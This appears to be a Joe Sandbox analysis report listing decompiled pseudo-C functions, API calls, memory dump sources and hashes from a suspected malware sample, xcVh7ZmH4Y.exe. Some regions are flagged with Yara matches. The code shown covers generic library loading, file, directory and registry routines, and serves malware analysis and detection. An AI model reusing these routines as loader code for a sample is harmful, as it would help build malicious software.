                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                      0x00406912
                                                                                      0x00406915
                                                                                      0x0040691c
                                                                                      0x00406924
                                                                                      0x00406930
                                                                                      0x00000000
                                                                                      0x00406937
                                                                                      0x00406927
                                                                                      0x0040692e
                                                                                      0x00000000
                                                                                      0x0040693f
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                        • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                        • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                        • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                      • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                      • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                      • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 68%
                                                                                      			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                      0x00406031
                                                                                      0x0040603e
                                                                                      0x00406053
                                                                                      0x00406059

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                      0x0040600d
                                                                                      0x00406013
                                                                                      0x00406018
                                                                                      0x00406021
                                                                                      0x00406021
                                                                                      0x0040602a

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                      0x00405af1
                                                                                      0x00405af9
                                                                                      0x00000000
                                                                                      0x00405aff
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                      • GetLastError.KERNEL32 ref: 00405AFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71032B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 19%
                                                                                      			E71032B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x71035050 != 0 && E71032ADB(_a4) == 0) {
					 *0x71035054 = _t93;
					if( *0x7103504c != 0) {
						_t93 =  *0x7103504c;
					} else {
						E710330C0(E71032AD5(), __ecx);
						 *0x7103504c = _t93;
					}
				}
				_t28 = E71032B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E71032AFD();
					_t72 = _a4;
					_t79 =  *0x71035058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x71035058 = _t72;
					E71032AF7();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x71035034 = _t33;
					 *0x71035038 = _t79;
					if( *0x71035050 != 0 && E71032ADB( *0x71035058) == 0) {
						 *0x7103504c = _t94;
						_t94 =  *0x71035054;
					}
					_t80 =  *0x71035058;
					_a4 = _t80;
					 *0x71035058 =  *((intOrPtr*)(E71032AFD() + _t80));
					_t37 = E71032AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E71032B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E71032B14() + _a4 + _v8);
							_push(E71032B1E());
							if( *0x71035050 <= 0 || E71032ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7103504c =  *0x7103504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x71035058;
					if( *0x71035058 == 0) {
						 *0x7103504c = 0;
					}
					E71032B42(_t107, _a4,  *0x71035034,  *0x71035038);
					return _a4;
				}
				_push(E71032B14() + _a4);
				_t56 = E71032B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E71032B26();
				_t87 = E71032B22();
				_t90 = E71032B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                      0x71032ba8
                                                                                      0x71032bb9
                                                                                      0x71032bc6
                                                                                      0x71032bda
                                                                                      0x71032bc8
                                                                                      0x71032bcd
                                                                                      0x71032bd2
                                                                                      0x71032bd2
                                                                                      0x71032bc6
                                                                                      0x71032be3
                                                                                      0x71032be8
                                                                                      0x71032bee
                                                                                      0x71032c32
                                                                                      0x71032c32
                                                                                      0x71032c37
                                                                                      0x71032c3c
                                                                                      0x71032c42
                                                                                      0x71032c44
                                                                                      0x71032c4a
                                                                                      0x71032c57
                                                                                      0x71032c59
                                                                                      0x71032c5e
                                                                                      0x71032c6b
                                                                                      0x71032c7e
                                                                                      0x71032c84
                                                                                      0x71032c8a
                                                                                      0x71032c8b
                                                                                      0x71032c91
                                                                                      0x71032c9d
                                                                                      0x71032ca3
                                                                                      0x71032cab
                                                                                      0x71032cac
                                                                                      0x71032caf
                                                                                      0x71032cba
                                                                                      0x71032cbc
                                                                                      0x71032cc8
                                                                                      0x71032cce
                                                                                      0x71032cd6
                                                                                      0x71032d02
                                                                                      0x71032d03
                                                                                      0x71032d05
                                                                                      0x71032d09
                                                                                      0x71032d09
                                                                                      0x71032d10
                                                                                      0x71032ce6
                                                                                      0x71032ce6
                                                                                      0x71032ce7
                                                                                      0x71032cf5
                                                                                      0x71032cfe
                                                                                      0x71032cfe
                                                                                      0x71032cd6
                                                                                      0x71032cba
                                                                                      0x71032d12
                                                                                      0x71032d19
                                                                                      0x71032d1b
                                                                                      0x71032d1b
                                                                                      0x71032d34
                                                                                      0x71032d42
                                                                                      0x71032d42
                                                                                      0x71032bf9
                                                                                      0x71032bfa
                                                                                      0x71032bff
                                                                                      0x71032c03
                                                                                      0x71032c08
                                                                                      0x71032c1c
                                                                                      0x71032c1d
                                                                                      0x71032c1e
                                                                                      0x71032c20
                                                                                      0x71032c25
                                                                                      0x71032c27
                                                                                      0x71032c27
                                                                                      0x71032c2a
                                                                                      0x71032c30
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000), ref: 71032C57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 2ce687fed797dbb9ada7017ad28d122b2173d12d61e7d99f2c19f8699f61d2a2
                                                                                      • Instruction ID: 2677044735a4b2627c74ca59847cef50c1d91897fa61e09f0fd1e6889ba7b991
                                                                                      • Opcode Fuzzy Hash: 2ce687fed797dbb9ada7017ad28d122b2173d12d61e7d99f2c19f8699f61d2a2
                                                                                      • Instruction Fuzzy Hash: 7641A072508209EFDB169FB6D984B4DBBB5EB84B10FB0886EF505C6120D73AA4858F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F539F8 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 311f3afab1036db68cfba640eb14c027b20115fab6d425a429687b66cee5c4f2
                                                                                      • Instruction ID: 49476ce71fe0146965cda56497aee1e32c6acd28533bea7f3810d991623b494e
                                                                                      • Opcode Fuzzy Hash: 311f3afab1036db68cfba640eb14c027b20115fab6d425a429687b66cee5c4f2
                                                                                      • Instruction Fuzzy Hash: A231F072348325CBDB286D2C8DA57FA62E1AF112C0F52005FAF8B83A41D3715A85C713
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4A55F Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: ec58151028f8efc65b837dbaabe370210b2bbed7ae06ecbb8102c61d99e6380b
                                                                                      • Instruction ID: 070ee565a855ab42347d3e4b5335cecab1d7b4a47e6008109f641d56baa64ffc
                                                                                      • Opcode Fuzzy Hash: ec58151028f8efc65b837dbaabe370210b2bbed7ae06ecbb8102c61d99e6380b
                                                                                      • Instruction Fuzzy Hash: 6F01F571A012B8AFDF349F188D147DE369ABF5A760F01421BED49EB204C3B08A81CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F547BE Relevance: 1.5, APIs: 1, Instructions: 42libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: aabdc0ce207b83f044765bec8ea6822e92b000eec4c2b97cd7408d46fbbed137
                                                                                      • Instruction ID: 766cdfbe7eec3d107d73c13f5f5f26b8061c552fecc67db7d8a4f92028029c7a
                                                                                      • Opcode Fuzzy Hash: aabdc0ce207b83f044765bec8ea6822e92b000eec4c2b97cd7408d46fbbed137
                                                                                      • Instruction Fuzzy Hash: 4601A271A452F89BDF349F288C047DA36A5AF5A761F05421BED19EB204C3B04A41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                                                      0x004023b2
                                                                                      0x004023b2
                                                                                      0x004023b4
                                                                                      0x004023b8
                                                                                      0x004023bb
                                                                                      0x004023c0
                                                                                      0x004023c5
                                                                                      0x004023ce
                                                                                      0x004023ce
                                                                                      0x004023d3
                                                                                      0x004023dc
                                                                                      0x004023dc
                                                                                      0x004023e9
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                      • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                      • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                      • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                      0x004063e2
                                                                                      0x004063eb
                                                                                      0x00406401
                                                                                      0x00000000
                                                                                      0x00406401
                                                                                      0x004063ef
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                      • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                      • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                      • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

